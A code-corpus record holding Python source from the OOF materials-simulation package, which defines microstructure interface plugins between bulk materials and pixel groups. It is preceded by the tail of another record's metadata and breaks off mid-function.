print(i)","repo_name":"sang981113/CodingTest","sub_path":"secret_map.py","file_name":"secret_map.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2140934223","text":"from ooflib.SWIG.common import ooferror\nfrom ooflib.SWIG.common import pixelgroup\nfrom ooflib.SWIG.common import switchboard\nfrom ooflib.SWIG.engine import material\nfrom ooflib.common import labeltree\nfrom ooflib.common import microstructure\nfrom ooflib.common import registeredclass\nfrom ooflib.common import runtimeflags\nfrom ooflib.common import utils\nfrom ooflib.common.IO import mainmenu\nfrom ooflib.common.IO import microstructureIO\nfrom ooflib.common.IO import pixelgroupparam\nfrom ooflib.engine import bdycondition\nfrom ooflib.engine import materialmanager\nfrom ooflib.engine import skeletoncontext\nfrom ooflib.engine import skeletonelement\nfrom ooflib.engine import subproblemcontext\nfrom ooflib.engine.IO import interfaceparameters\nfrom ooflib.engine.IO import materialmenu\nfrom ooflib.engine.IO import materialparameter\nimport ooflib.engine.mesh\n\nimport sys\n\nNO_MATERIAL=interfaceparameters.NO_MATERIAL_STR\nNO_PIXELGROUP=interfaceparameters.NO_PIXELGROUP_STR\nNORTH=interfaceparameters.NORTH_STR\nSOUTH=interfaceparameters.SOUTH_STR\nEAST=interfaceparameters.EAST_STR\nWEST=interfaceparameters.WEST_STR\nANY=interfaceparameters.ANY_STR\n\n# Return type for getAdjacentElements -- not very complicated, but\n# nomenclature was a pretty big stumbling block to getting the\n# interfaces right, so we're being extra-careful. Left and right are\n# the elements whose materials correspond to the left-material and\n# right-material (or pixel group, etc.) of the interface.\nclass AdjacentElements:\n def __init__(self,left=None,right=None):\n self.left = left\n self.right = right\n def __nonzero__(self):\n # If either element is not None, then we're \"true\". Can't do\n # the obvious \"return self.left or self.right\", because this\n # can be None, but the allowed return values are True, False,\n # 0, or 1.\n if self.left or self.right:\n return True\n return False\n\n\n#Region outside of mesh divided into four\n#virtual materials or pixelgroups:\n#\n# \n# -------\n# | |\n# | | \n# | |\n# -------\n# \n#\n# North commences the bidding....\n\n\n# For some reason, just declining to register the plug-in doesn't\n# remove references to MATERIALTYPE_INTERFACE. So, we null it out\n# here. This egregious hackery will be removed once the surface stuff\n# is working, and then removed even more when we migrate to 3D.\ninterface_mat_type = None\nif runtimeflags.surface_mode:\n interface_mat_type = material.MATERIALTYPE_INTERFACE\n\n\nOOF = mainmenu.OOF\n\nclass InterfaceMSPlugIn(microstructure.MicrostructurePlugIn):\n def __init__(self, ms):\n microstructure.MicrostructurePlugIn.__init__(self, ms)\n self.namedinterfaces=utils.OrderedDict()\n self._materialassignments={}\n self._selectedInterfaceName=None\n\n self.sbcallbacks = [\n## switchboard.requestCallback(\"materials changed in microstructure\",\n## self.matChanged),\n## switchboard.requestCallback('destroy pixel group',\n## self.destpixgrp),\n## switchboard.requestCallback('changed pixel group', self.changedpixgrp)\n #TODO 3.1: Figure this out?\n #switchboard.requestCallback('changed pixel groups', self.chngdgrps)\n ]\n\n #TODO MER: Somehow use a timestamp in the mesh for interfaces (see mesh.py)\n\n## I don't know what parts of this are actually used. The switchboard\n## requests above were commented out, so I commented out their\n## callbacks too. I didn't follow through to find out which of the\n## other methods are only called by the callbacks, nor do I know why\n## the requests are commented out. (SAL, July 9, 2009)\n\n# #This is a response to an (un)assignment of a material to a microstructure\n# def matChanged(self, msobj):\n# # switchboard \"materials changed ...\"\n# #TODO 3.1: Make this more specific (like check if the material\n# #that was assigned or unassigned is part of an interface\n# #definition...) Would this clash with the other \"materials\n# #changed...\" handlers?\n# if msobj==self.microstructure:\n# if len(self.namedinterfaces)>0:\n# #A rebuild is not trigggered by changes in the\n# #skeleton boundaries\n# self.rebuildMeshes()\n\n# def destpixgrp(self, group, ms_name):\n# # switchboard 'destroy pixel group'\n# self.deleteGroup(ms_name,group)\n\n# #Reaction to \"changed pixel group\" similar to \"materials changed\n# #in microstructure\"\n# def changedpixgrp(self, group, ms_name):\n# #Check if group is in the definition of one or more interfaces?\n# if ms_name==self.microstructure.name():\n# self.matChanged(self.microstructure)\n\n# def deleteGroup(self,ms_name,group):\n# if ms_name!=self.microstructure.name():\n# return\n# if len(self.namedinterfaces)==0:\n# return\n# interfacenames=self.getInterfaceNames()\n# doomedinterfaces=[]\n# for interfacename in interfacenames:\n# interfaceobj=self.namedinterfaces[interfacename]\n# if interfaceobj.hasGroup(group.name()):\n# del self.namedinterfaces[interfacename]\n# doomedinterfaces.append(interfacename)\n# self.removeMaterialFromInterfaces(doomedinterfaces)\n# #Remove boundary conditions that refer to the doomedinterfaces\n# meshclass=ooflib.engine.mesh.meshes\n# msname=self.microstructure.name()\n# for meshkey in meshclass.keys(base=msname):\n# meshctxt=meshclass[[msname]+meshkey]\n# for doomedinterfacename in doomedinterfaces:\n# meshctxt.removeInterface(doomedinterfacename)\n# self.rebuildMeshes()\n# switchboard.notify(\"interface removed\",self.microstructure)\n\n def renameGroup(self,oldgroupname,newgroupname):\n for interfaceobj in self.namedinterfaces.values():\n interfaceobj.renameGroup(oldgroupname,newgroupname)\n #A group has been renamed, it is possible the details of\n #one or more interfaces have been changed. \n switchboard.notify(\"interface renamed\",self.microstructure)\n\n def destroy(self):\n map(switchboard.removeCallback, self.sbcallbacks)\n microstructure.MicrostructurePlugIn.destroy(self)\n\n def interfaceInfo(self,interfacename):\n try:\n return self.namedinterfaces[interfacename].__repr__()\n except KeyError:\n return \"\"\n\n def getInterfaceNames(self):\n return self.namedinterfaces.keys()[:]\n\n #Returns strings of the form \"skeleton:bdkey\"\n def getSkelBdyNames(self):\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n names=[]\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n names.append(skelkey[0]+\":\"+bname)\n return names\n\n #Return skeleton boundary names in skeleton skelname\n def getOneSkelBdyNames(self,skelname):\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n names=[]\n for skelkey in skelclass.keys(base=msname):\n if skelkey[0]!=skelname:\n continue\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n names.append(bname)\n return names\n\n #Return skeleton boundary names common to all skeletons\n def getCommonSkelBdyNames(self):\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n namedict={}\n numskels=len(skelclass.keys(base=msname))\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n try:\n namedict[bname]=namedict[bname]+1\n except KeyError:\n namedict[bname]=1\n names=[]\n for bname,count in namedict.items():\n if count==numskels:\n names.append(bname)\n return names\n\n def getInterfaceNamesWithMaterial(self,matname):\n try:\n names=self._materialassignments[matname][:]\n return names\n except KeyError:\n return []\n\n def getSkelBdyNamesWithMaterial(self,matname):\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n names=[]\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n bdyctxt=skelctxt.getBoundary(bname)\n if bdyctxt._interfacematerial==matname:\n names.append(skelkey[0]+\":\"+bname)\n return names\n\n #Get material assigned to interfacename\n def getInterfaceMaterialName(self,interfacename):\n for matname, interfacenamelist in self._materialassignments.items():\n if interfacename in interfacenamelist:\n return matname\n return None\n\n #This method returns materials assigned to interfaces and boundaries.\n #In contrast, materialmanager.getInterfaceMaterialNames returns\n #all interface materials listed on the Materials page.\n def getInterfaceMaterials(self):\n matdict={}\n for matname, interfacenames in self._materialassignments.items():\n if len(interfacenames)>0:\n matdict[matname]=1\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n bdyctxt=skelctxt.getBoundary(bname)\n if bdyctxt._interfacematerial is not None:\n matdict[bdyctxt._interfacematerial]=1\n return matdict.keys()\n\n def addInterface(self,name,interfacedef):\n self.namedinterfaces[name]=interfacedef\n switchboard.notify(\"new interface created\",self.microstructure)\n self.selectInterface(name)\n self.rebuildMeshes()\n\n def removeInterface(self,name):\n try:\n del self.namedinterfaces[name]\n interfacenames=self.getInterfaceNames()\n doomedinterfaces=[name]\n #Because of the possibility of compound interfaces (e.g. union),\n #we must search the other interfaces for the presence\n #of the interface corresponding to name.\n for interfacename in interfacenames:\n interfaceobj=self.namedinterfaces[interfacename]\n if interfaceobj.hasInterface(name):\n del self.namedinterfaces[interfacename]\n doomedinterfaces.append(interfacename)\n self.removeMaterialFromInterfaces(doomedinterfaces)\n self.unselectInterface()\n # #Remove boundary conditions that refer to the doomedinterfaces\n # meshclass=ooflib.engine.mesh.meshes\n # msname=self.microstructure.name()\n # for meshkey in meshclass.keys(base=msname):\n # meshctxt=meshclass[[msname]+meshkey]\n # for doomedinterfacename in doomedinterfaces:\n # meshctxt.removeInterface(doomedinterfacename)\n self.rebuildMeshes()\n switchboard.notify(\"interface removed\",self.microstructure)\n except KeyError:\n pass\n\n def getCurrentReservedNames(self):\n reservednamedict={}\n for iname in self.getInterfaceNames():\n reservednamedict[iname]=1\n skelclass=skeletoncontext.skeletonContexts\n msname=self.microstructure.name()\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allBoundaryNames():\n reservednamedict[bname]=1\n reservednamedict['top']=1\n reservednamedict['bottom']=1\n reservednamedict['left']=1\n reservednamedict['right']=1\n reservednamedict['topleft']=1\n reservednamedict['topright']=1\n reservednamedict['bottomleft']=1\n reservednamedict['bottomright']=1\n return reservednamedict.keys()\n\n def renameInterface(self,oldname,newname):\n if oldname==newname:\n return\n if newname in self.getCurrentReservedNames():\n raise ooferror.ErrSetupError(\"Name %s already in use.\" % newname)\n try:\n obj=self.namedinterfaces[oldname]\n del self.namedinterfaces[oldname]\n self.namedinterfaces[newname]=obj\n interfacenames=self.getInterfaceNames()\n #Because of the possibility of compound interfaces (e.g. union),\n #we must search the other interfaces for the presence\n #of the interface corresponding to oldname.\n for interfacename in interfacenames:\n interfaceobj=self.namedinterfaces[interfacename]\n interfaceobj.renameInterface(oldname,newname)\n #interface must also be renamed in the list of\n #material assignments\n matname=self.getInterfaceMaterialName(oldname)\n self.removeMaterialFromInterfaces([oldname])\n self.assignMaterialToInterfaces(matname,[newname])\n #Rename the interface in the boundary conditions\n #and in the edgements.\n meshclass=ooflib.engine.mesh.meshes\n msname=self.microstructure.name()\n for meshkey in meshclass.keys(base=msname):\n meshctxt=meshclass[[msname]+meshkey]\n meshctxt.renameInterface(oldname,newname)\n self.selectInterface(newname)\n switchboard.notify(\"interface renamed\",self.microstructure)\n except KeyError:\n pass\n\n #Assign material (matname) to interfaces and boundaries in the list interfacenames\n def assignMaterialToInterfaces(self,matname,interfacenames,skeletonname=None):\n \n #Extract the skeleton boundary names from interfacenames.\n #The skeleton boundaries are not listed in _materialassignments.\n #The interfacematerial is an attribute of the\n #skeleton context edge boundary. This way,\n #we do not have to explicitly handle changes in the\n #names of skeletons and skeleton boundaries.\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n skelbdynamesdict={}\n for skelkey in skelclass.keys(base=msname):\n if skeletonname!=interfaceparameters.SkelAllParameter.extranames[0] and \\\n skeletonname!=skelkey[0]:\n continue\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n if bname in interfacenames:\n skelbdynamesdict[bname]=1\n bdyctxt=skelctxt.getBoundary(bname)\n bdyctxt._interfacematerial=matname\n\n #Remove skeleton boundary names from interfacenames\n for bname in skelbdynamesdict:\n interfacenames.remove(bname)\n\n #First unassign interfacenames from any material\n self.removeMaterialFromInterfaces(interfacenames,skeletonname)\n try:\n interfacenamelist=self._materialassignments[matname]\n #After the call to removeMaterialFromInterfaces above,\n #there should be no duplicates in the sum on the right hand side\n self._materialassignments[matname]=interfacenamelist+interfacenames\n except KeyError:\n self._materialassignments[matname]=interfacenames[:]\n\n## print \"assignments to interfaces\", self._materialassignments\n## print \"all assigned materials\", self.getInterfaceMaterials()\n \n #Remove the interfaces indicated in interfacenames from their material\n #assignments\n def removeMaterialFromInterfaces(self,interfacenames,skeletonname=None):\n #The skeleton boundaries are not listed in _materialassignments.\n #The interfacematerial is an attribute of the\n #skeleton context edge boundary. This way,\n #we do not have to explicitly handle changes in the\n #names of skeletons and skeleton boundaries.\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n for skelkey in skelclass.keys(base=msname):\n if skeletonname!=interfaceparameters.SkelAllParameter.extranames[0] and \\\n skeletonname!=skelkey[0]:\n continue\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n if bname in interfacenames:\n bdyctxt=skelctxt.getBoundary(bname)\n bdyctxt._interfacematerial=None\n\n for matname, interfacenamelist in self._materialassignments.items():\n for interfacename in interfacenames:\n if interfacename in interfacenamelist:\n interfacenamelist.remove(interfacename)\n \n #Implement changes to the interfaces when a material is deleted\n #in the materials page. If the material is an interface material,\n #remove entry for this material in _materialassignments.\n #If the material is a bulk material, interfaces that have this\n #material as an attribute are removed.\n #TODO 3.1: For a union of interfaces, not necessary to delete the whole\n #union.\n def deleteMaterial(self,matname,material_type):\n # if material_type==material.MATERIALTYPE_INTERFACE:\n if material_type == interface_mat_type:\n try:\n del self._materialassignments[matname]\n except KeyError:\n pass\n #Unassociate matname from skeleton boundaries\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n bdyctxt=skelctxt.getBoundary(bname)\n if bdyctxt._interfacematerial==matname:\n bdyctxt._interfacematerial=None\n else:\n if len(self.namedinterfaces)==0:\n return\n interfacenames=self.getInterfaceNames()\n doomedinterfaces=[]\n for interfacename in interfacenames:\n interfaceobj=self.namedinterfaces[interfacename]\n if interfaceobj.hasBulkMaterial(matname):\n del self.namedinterfaces[interfacename]\n doomedinterfaces.append(interfacename)\n self.removeMaterialFromInterfaces(doomedinterfaces)\n #Remove boundary conditions that refer to the doomedinterfaces\n meshclass=ooflib.engine.mesh.meshes\n msname=self.microstructure.name()\n for meshkey in meshclass.keys(base=msname):\n meshctxt=meshclass[[msname]+meshkey]\n for doomedinterfacename in doomedinterfaces:\n meshctxt.removeInterface(doomedinterfacename)\n self.rebuildMeshes()\n switchboard.notify(\"interface removed\",self.microstructure)\n\n def renameMaterial(self,oldmatname,newmatname,material_type):\n # if material_type==material.MATERIALTYPE_INTERFACE:\n if material_type==interface_mat_type:\n try:\n interfacenamelist=self._materialassignments[oldmatname]\n del self._materialassignments[oldmatname]\n self._materialassignments[newmatname]=interfacenamelist\n except KeyError:\n pass\n #Rename materials associated with skeleton boundaries\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n bdyctxt=skelctxt.getBoundary(bname)\n if bdyctxt._interfacematerial==oldmatname:\n bdyctxt._interfacematerial=newmatname\n else:\n for interfaceobj in self.namedinterfaces.values():\n interfaceobj.renameBulkMaterial(oldmatname,newmatname)\n #A material has been renamed, it is possible the details of\n #one or more interfaces have been changed. \n switchboard.notify(\"interface renamed\",self.microstructure)\n\n # The selected interface isn't actually used for anything directly,\n # but it's displayed in the GUI and its name is passed in as an\n # argument to commands that operate on interfaces. \n def selectInterface(self, interfacename):\n self._selectedInterfaceName = interfacename\n #self.bdyselected.increment() # timestamp\n switchboard.notify(\"interface selected\",\n self.microstructure, #ms object (microstructure.py)\n interfacename)\n #switchboard.notify('redraw')\n def unselectInterface(self):\n if self._selectedInterfaceName is not None:\n self._selectedInterfaceName = None\n #self.bdyselected.increment()\n switchboard.notify(\"interface unselected\",\n self.microstructure)\n #switchboard.notify('redraw')\n def getSelectedInterfaceName(self):\n return self._selectedInterfaceName\n def getSelectedInterface(self): # returns Interface object\n if self._selectedInterfaceName is not None:\n return self.namedinterfaces[self._selectedInterfaceName]\n\n #Cases when we want to rebuild the mesh:\n #(1) Interfaces added or removed\n #(2) Bulk materials get deleted\n #(3) Bulk materials get assigned to pixels\n #(4) Renaming an interface material might also trigger a rebuild(?)\n #(5) Pixel groups get destroyed or changed.\n def rebuildMeshes(self):\n meshclass = ooflib.engine.mesh.meshes\n msname = self.microstructure.name()\n for meshkey in meshclass.keys(base=msname):\n mesh = meshclass[[msname] + meshkey]\n mesh.begin_writing()\n try:\n mesh.interfacesChanged() # marks mesh as OutOfSync\n finally:\n mesh.end_writing()\n\nmicrostructure.registerMicrostructurePlugIn(InterfaceMSPlugIn, \"Interfaces\")\n\n#######################################################\n#Interface definitions. All interfaces are subclasses of InterfaceDef. \n\nclass InterfaceDef(registeredclass.RegisteredClass):\n registry = []\n tip = \"Tools to define interfaces.\"\n discussion = \"\"\"\n InterfaceDef objects are used by the\n command\n to define interfaces in a µ.\n \"\"\"\n def addToMS(self,interfacemsplugin,interfacename):\n interfacemsplugin.addInterface(interfacename,self)\n def check(self):\n pass\n def hasBulkMaterial(self,bulkmatname):\n return 0\n def renameBulkMaterial(self,oldname,newname):\n return 0\n # hasGroup and renameGroup are isomorphic to hasBulkMaterial and\n # renameBulkMaterial. A generic function may be defined that does\n # hasGroup and hasBulkMaterial, for example, but I'll leave the\n # distinction here.\n def hasGroup(self,groupname):\n return 0\n def renameGroup(self,oldname,newname):\n return 0\n def hasInterface(self,interfacename):\n## if interfaceobj==self:\n## return 1\n return 0\n def renameInterface(self,oldname,newname):\n pass\n\nclass MaterialInterface(InterfaceDef):\n def __init__(self,left,right):\n #members must be spelled the same as the parameters\n self.left=left\n self.right=right\n def check(self):\n if self.left==self.right:\n return 'The two sides must have different materials!'\n #RegisteredClass already has a __repr__\n## def info(self):\n## return \"Between Bulk Materials (%s,%s)\" % (self.left,self.right)\n #Useful function for finding out if the pair of bulk materials\n #already has an interface material assigned to it.\n## def __eq__(self,other):\n## if self.__class__!=other.__class__:\n## return 0\n## return ((self._mat1==other._mat1 and \\\n## self._mat2==other._mat2) or\n## (self._mat1==other._mat2 and\n## self._mat2==other._mat1))\n # This function is used by the mesh construction function to test\n # whether a skeleton segment is part of the interface. For\n # segments which are parts of interfaces, it should return the\n # left and right elements. One or the other of these may be null,\n # but they should reflect the correct local geometry in any case.\n def getAdjacentElements(self,seg,skelctxt):\n els = seg.getElements()\n if len(els) > 1:\n mat0 = els[0].material(skelctxt)\n mat1 = els[1].material(skelctxt)\n if mat0==mat1: #Optional, if check() is used.\n return AdjacentElements()\n\n mat0name=NO_MATERIAL\n if mat0:\n mat0name=mat0.name()\n mat1name=NO_MATERIAL\n if mat1:\n mat1name=mat1.name()\n\n if self.left==mat0name and self.right==mat1name:\n return AdjacentElements(els[0],els[1])\n if self.right==mat0name and self.left==mat1name:\n return AdjacentElements(els[1],els[0])\n if self.left==ANY:\n if self.right==mat0name:\n return AdjacentElements(els[1],els[0])\n if self.right==mat1name:\n return AdjacentElements(els[0],els[1])\n if self.right==ANY:\n if self.left==mat0name:\n return AdjacentElements(els[0],els[1])\n if self.left==mat1name:\n return AdjacentElements(els[1],els[0])\n else:\n # Only one element in the segment's element list -- we are\n # on the boundary. We still might have a positive response.\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n xmax=skelctxt.getMicrostructure().size().x\n ymax=skelctxt.getMicrostructure().size().y\n if n0.y==ymax and n1.y==ymax:\n compass=NORTH #golden\n elif n0.y==0.0 and n1.y==0.0:\n compass=SOUTH\n elif n0.x==xmax and n1.x==xmax:\n compass=EAST\n #elif n0.x==0.0 and n1.x==0.0:\n else:\n compass=WEST\n #\n matname=NO_MATERIAL\n mat = els[0].material(skelctxt)\n if mat:\n matname=mat.name()\n if (self.left==matname or self.left==ANY) \\\n and self.right==compass:\n return AdjacentElements(els[0],None)\n elif self.left==compass and \\\n (self.right==matname or self.right==ANY):\n return AdjacentElements(None,els[0])\n return AdjacentElements()\n def hasBulkMaterial(self,bulkmatname):\n if self.left==bulkmatname or self.right==bulkmatname:\n return 1\n return 0\n def renameBulkMaterial(self,oldname,newname):\n numrenamed=0\n if self.left==oldname:\n self.left=newname\n numrenamed+=1\n if self.right==oldname:\n self.right=newname\n numrenamed+=1\n return 0\n\nregisteredclass.Registration(\n \"Between Bulk Materials\",\n InterfaceDef,\n MaterialInterface,\n ordering=10,\n params = [\n materialparameter.BulkMaterialParameterExtra('left',\n tip=\"Bulk Material.\"),\n materialparameter.BulkMaterialParameterExtra('right',\n tip=\"Bulk Material.\")\n ],\n tip=\"Define an interface between elements with different bulk materials.\",\n discussion = \"\"\"\n\n The object constructed from this class represents an interface between\n two different bulk materials.\n\n \"\"\"\n )\n\nclass SingleMaterialInterface(InterfaceDef):\n def __init__(self,left):\n self.left=left\n def check(self):\n if self.left==ANY:\n return 'Not a valid input!'\n #This function is used by the mesh construction function to test\n #whether a skeleton segment is part of the interface.\n def getAdjacentElements(self,seg,skelctxt):\n els = seg.getElements()\n if len(els) > 1:\n mat1 = els[0].material(skelctxt)\n mat2 = els[1].material(skelctxt)\n if mat1==mat2:\n return (0,None)\n if self.left==NO_MATERIAL:\n if (mat1 is None):\n return AdjacentElements(els[0],els[1])\n if (mat2 is None):\n return AdjacentElements(els[1],els[0])\n if (mat1 and self.left==mat1.name()):\n return AdjacentElements(els[0],els[1])\n if (mat2 and self.left==mat2.name()):\n return AdjacentElements(els[1],els[0])\n else:\n if self.left==NORTH:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n ymax=skelctxt.getMicrostructure().size().y\n if n0.y==ymax and n1.y==ymax:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n if self.left==SOUTH:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n if n0.y==0.0 and n1.y==0.0:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n if self.left==EAST:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n xmax=skelctxt.getMicrostructure().size().x\n if n0.x==xmax and n1.x==xmax:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n if self.left==WEST:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n if n0.x==0.0 and n1.x==0.0:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n mat = els[0].material(skelctxt)\n if mat:\n if self.left==mat.name():\n return AdjacentElements(els[0],None)\n # Default...\n return InterfaceMaterial()\n def hasBulkMaterial(self,bulkmatname):\n if self.left==bulkmatname:\n return 1\n return 0\n def renameBulkMaterial(self,oldname,newname):\n if self.left==oldname:\n self.left=newname\n return 1\n return 0\n\nregisteredclass.Registration(\n \"Around a Single Material\",\n InterfaceDef,\n SingleMaterialInterface,\n ordering=15,\n params = [\n materialparameter.BulkMaterialParameterExtra('left',\n tip=\"Bulk Material.\")\n ],\n tip=\"Define an interface around elements with a given bulk material.\",\n discussion = \"\"\"\n\n The object constructed from this class represents an interface between\n the specified bulk material and any other bulk material (or no material).\n\n \"\"\"\n )\n\nclass PixelGroupInterface(InterfaceDef):\n def __init__(self,left,right):\n self.left=left\n self.right=right\n def check(self):\n if self.left==self.right:\n return 'The two sides must have different pixel groups!'\n #This function is used by the mesh construction function to test\n #whether a skeleton segment is part of the interface.\n def getAdjacentElements(self,seg,skelctxt):\n els = seg.getElements()\n if len(els) > 1:\n msobj=skelctxt.getMicrostructure()\n where = msobj.getRepresentativePixel(\n els[0].dominantPixel(msobj))\n grpnames1 = pixelgroup.pixelGroupNames(msobj, where)\n where = msobj.getRepresentativePixel(\n els[1].dominantPixel(msobj))\n grpnames2 = pixelgroup.pixelGroupNames(msobj, where)\n if self.left!=NO_PIXELGROUP and \\\n self.right!=NO_PIXELGROUP:\n if (self.left in grpnames1 and \\\n self.right in grpnames2):\n return AdjacentElements(els[0],els[1])\n if (self.left in grpnames2 and \\\n self.right in grpnames1):\n return AdjacentElements(els[1],els[0])\n elif self.left!=NO_PIXELGROUP:\n if (self.left in grpnames1 and \\\n len(grpnames2)==0):\n return AdjacentElements(els[0],els[1])\n if (self.left in grpnames2 and \\\n len(grpnames1)==0):\n return AdjacentElements(els[1],els[0])\n elif self.right!=NO_PIXELGROUP:\n if (self.right in grpnames1 and \\\n len(grpnames2)==0):\n return AdjacentElements(els[1],els[0])\n if (self.right in grpnames2 and \\\n len(grpnames1)==0):\n return AdjacentElements(els[0],els[1])\n else:\n #Determine on which external boundary the segment lies\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n xmax=skelctxt.getMicrostructure().size().x\n ymax=skelctxt.getMicrostructure().size().y\n if n0.y==ymax and n1.y==ymax:\n compass=NORTH #golden\n elif n0.y==0.0 and n1.y==0.0:\n compass=SOUTH\n elif n0.x==xmax and n1.x==xmax:\n compass=EAST\n #elif n0.x==0.0 and n1.x==0.0:\n else:\n compass=WEST\n #\n msobj=skelctxt.getMicrostructure()\n where = msobj.getRepresentativePixel(\n els[0].dominantPixel(msobj))\n grpnames = pixelgroup.pixelGroupNames(msobj, where)\n if self.left==compass and \\\n ((self.right in grpnames) or self.right==ANY):\n return AdjacentElements(None,els[0])\n if self.right==compass and \\\n ((self.left in grpnames) or self.left==ANY):\n return AdjacentElements(els[0],None)\n return AdjacentElements()\n\n def hasGroup(self,groupname):\n if self.left==groupname or self.right==groupname:\n return 1\n return 0\n def renameGroup(self,oldname,newname):\n if self.left==oldname:\n self.left=newname\n return 1\n if self.right==oldname:\n self.right=newname\n return 1\n return 0\n\nregisteredclass.Registration(\n \"Between Pixel Groups\",\n InterfaceDef,\n PixelGroupInterface,\n ordering=20,\n params = [\n pixelgroupparam.PixelGroupInterfaceParameter('left',\n tip=\"Pixels.\"),\n pixelgroupparam.PixelGroupInterfaceParameter('right',\n tip=\"Pixels.\")\n ],\n tip=\"Define an interface between elements with different pixel groups.\",\n discussion = \"\"\"\n\n The object constructed from this class represents an interface between\n two different pixel groups.\n\n \"\"\"\n )\n\nclass SinglePixelGroupInterface(InterfaceDef):\n def __init__(self,left):\n self.left=left\n def check(self):\n if self.left==ANY:\n return 'Not a valid input!'\n #This function is used by the mesh construction function to test\n #whether a skeleton segment is part of the interface.\n def getAdjacentElements(self,seg,skelctxt):\n els = seg.getElements()\n if len(els) > 1:\n msobj=skelctxt.getMicrostructure()\n where = msobj.getRepresentativePixel(\n els[0].dominantPixel(msobj))\n grpnames1 = pixelgroup.pixelGroupNames(msobj, where)\n where = msobj.getRepresentativePixel(\n els[1].dominantPixel(msobj))\n grpnames2 = pixelgroup.pixelGroupNames(msobj, where)\n if self.left!=NO_PIXELGROUP:\n if (self.left in grpnames1 and \\\n self.left not in grpnames2):\n return AdjacentElements(els[0],els[1])\n if (self.left in grpnames2 and \\\n self.left not in grpnames1):\n return AdjacentElements(els[1],els[0])\n else:\n if (len(grpnames1)>0 and len(grpnames2)==0):\n return AdjacentElements(els[1],els[0])\n if (len(grpnames2)>0 and len(grpnames1)==0):\n return AdjacentElements(els[0],els[1])\n else:\n if self.left==NORTH:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n ymax=skelctxt.getMicrostructure().size().y\n if n0.y==ymax and n1.y==ymax:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n if self.left==SOUTH:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n if n0.y==0.0 and n1.y==0.0:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n if self.left==EAST:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n xmax=skelctxt.getMicrostructure().size().x\n if n0.x==xmax and n1.x==xmax:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n if self.left==WEST:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n if n0.x==0.0 and n1.x==0.0:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n msobj=skelctxt.getMicrostructure()\n where = msobj.getRepresentativePixel(\n els[0].dominantPixel(msobj))\n grpnames = pixelgroup.pixelGroupNames(msobj, where)\n if self.left in grpnames:\n return AdjacentElements(els[0],None)\n # Default, obviously.\n return AdjacentElements()\n\n\n\n def hasGroup(self,groupname):\n if self.left==groupname:\n return 1\n return 0\n def renameGroup(self,oldname,newname):\n if self.left==oldname:\n self.left=newname\n return 1\n return 0\n\nregisteredclass.Registration(\n \"Around a Pixel Group\",\n InterfaceDef,\n SinglePixelGroupInterface,\n ordering=30,\n params = [\n pixelgroupparam.PixelGroupInterfaceParameter('left',\n tip=\"Pixels.\")\n ],\n tip=\"Define an interface around elements with a given pixel group.\",\n discussion = \"\"\"\n\n The object constructed from this class represents an interface between\n the specified pixel group and any other pixel group (or no pixel group).\n\n \"\"\"\n )\n\n#Create a CompoundInterface parent class?\nclass UnionInterface(InterfaceDef):\n def __init__(self,interfaces):\n self.interfaces=interfaces\n self.namedinterfaces=utils.OrderedDict()\n## for interfacename in interfaces:\n## self.namedinterfaces[interfacename]=interfacemsplugin.namedinterfaces[interfacename]\n def addToMS(self,interfacemsplugin,interfacename):\n for name in self.interfaces:\n self.namedinterfaces[name]=interfacemsplugin.namedinterfaces[name]\n interfacemsplugin.addInterface(interfacename,self)\n## def info(self):\n## return \"Union of interfaces\\n\" + self.namedinterfaces\n## def __eq__(self,other):\n## if 